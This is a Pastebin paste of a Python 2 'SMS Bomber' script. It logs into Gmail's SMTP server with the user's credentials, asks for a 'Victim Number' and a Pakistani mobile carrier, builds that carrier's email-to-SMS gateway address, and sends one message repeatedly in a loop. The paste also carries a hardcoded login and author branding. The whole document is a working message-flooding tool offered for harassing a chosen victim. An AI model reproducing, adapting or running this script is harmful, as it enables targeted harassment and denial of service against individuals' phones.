Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import smtplib
- import sys
- import os
- os.system('title Python Sms Bomber')
- mailserver = smtplib.SMTP('smtp.gmail.com')
- mailserver.ehlo()
- mailserver.starttls()
- mailserver.ehlo()
- print '''
- ==> Welcome to Python SMS Bomber.
- ==> Author: Muhammad Adeel
- ==> FB: fb.com/xtoker
- ==> Mail: [email protected]
- ==> Currently Available Carriers are:
- 1. Mobilink
- 2. Telenor
- 3. Ufone
- 4. Warid
- 5. Zong
- ==> Welcome to Login Panel:
- '''
- username = ""
- while not username:
- username = raw_input("Enter Username: ")
- password = ""
- while not password:
- password = raw_input("Enter Password: ")
- if username == "stoker" and password == "stoker":
- print """
- ______ ___ ___
- | ___ \ | | | |
- | |_/ /_ _| |__ ___ _ __ ___ | |__
- | __/| | | | '_ \ / _ \| '_ ` _ \| '_ \
- | | | |_| | |_) | (_) | | | | | | |_) |
- \_| \__, |_.__/ \___/|_| |_| |_|_.__/
- __/ |
- |___/
- Author: Muhammad adeel aka Innoxent Stoker
- FB: fb.com/xtoker
- Mail: [email protected]
- \n"""
- else:
- print "\n==> Wrong Username and Password."
- sys.exit()
- username = raw_input("==> Your Email Adress: ")
- password = raw_input("==> Email's Password: ")
- number = raw_input("==> Victim Number: ")
- carrier = raw_input("==> Carrier: ")
- text = raw_input("==> Your Message: ")
- time = int(raw_input("==> How many Times you want to send: "))
- print '\n==> Please Wait ....\n'
- print '==> Bomber is Starting...\n'
- if carrier == "Mobilink":
- sendto = number+'@mobilinkworld.com'
- elif carrier == "Telenor":
- sendto = number+'@telenor.com'
- elif carrier == "Ufone":
- sendto = number+'@ufonemms.com'
- elif carrier == "Warid":
- sendto = number+'@warid.com'
- elif carrier == "Zong":
- sendto = number+'@zong.com'
- else:
- print "Invalid Carrier."
- mailserver.login(username,password)
- x = raw_input("Hit 'Enter' To Launch Bomber .. ")
- for x in range(0,time) :
- mailserver.sendmail(username, sendto, text)
- print "Message Has been Sent."
- mailserver.close()
- stopapp = raw_input("Job Finished! Press 'ENTER' to close Programme")
Add Comment
Please, Sign In to add comment